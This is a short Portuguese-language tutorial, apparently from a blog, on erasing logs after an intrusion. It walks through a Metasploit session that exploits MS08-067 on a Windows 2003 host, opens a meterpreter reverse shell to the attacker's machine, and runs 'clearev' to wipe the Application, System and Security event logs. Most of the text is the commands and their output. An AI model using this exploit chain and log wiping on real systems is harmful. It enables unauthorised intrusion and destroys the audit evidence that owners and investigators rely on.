Depois do ataque, a primeira tarefa do invasor ser\u00e1 apagar LOGs. \u00c9 claro que existem diversas maneiras de exclus\u00e3o, principalmente se o sistema operacional for UNIX, pois processos n\u00e3o impedir\u00e3o a exclus\u00e3o de arquivos como no Windows, ou seja, bastar\u00e1 ter poder de root e nada que um toque da morte possa resolver.<\/p>\n
A seguir, utilizarei o metasploit para exclus\u00e3o de LOGs de uma m\u00e1quina Windows.<\/p>\n
1\u00ba) Primeiramente vamos comprometer o alvo<\/p>\n
msf > use windows\/smb\/ms08_67_netapi\nmsf exploit (ms08_067_netapi) > set LHOST 192.168.42.150\nLHOST => 192.168.42.150\nmsf exploit (ms08_067_netapi) > set RHOST 192.168.42.254\nRHOST => 192.168.42.254\nmsf exploit (ms08_067_netapi) > set PAYLOAD windows\/meterpreter\/reverse_tcp\npayload => windows\/meterpreter\/reverse_tcp\nmsf exploit (ms08_067_netapi) > exploit\n[*] Started reverse handler on 192.168.42.150:4444\n[*] Automatically detecting the target \u2026\n[*] Fingerprint: Windows 2003 \u2013 No Service Pack \u2013 lang:Unknown\n[*] Selected Target: Windows 2003 SP0 Universal\n[*] Attempting to trigger the vulnerability \u2026\n[*] Sending stage (749056 bytes) to 192.168.42.254\n[*] Meterpreter session 1 opened (192.168.42.150:4444 -> 192.168.42.254:1031) at 2012-05-22 15:37:35 -0300\n\n<\/pre>\n2\u00ba)Passo: Agora colocamos o meterpreter em a\u00e7\u00e3o, utilizamos o clearev:<\/p>\n
meterpreter > clearev\n[*] Wiping 200 records from Application\u2026\n[*] Wiping 300 records from System\u2026\n[*] Wiping 90 records from Security\u2026\n\n<\/pre>\nAi est\u00e1, simples !!! 200 registros aplica\u00e7\u00e3o + 300 de sistemas + 90 de seguran\u00e7a apagados.<\/p>\n
E isso ai !!!!<\/p>\n\r\n\t\t
\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t
\r\n\t\t\t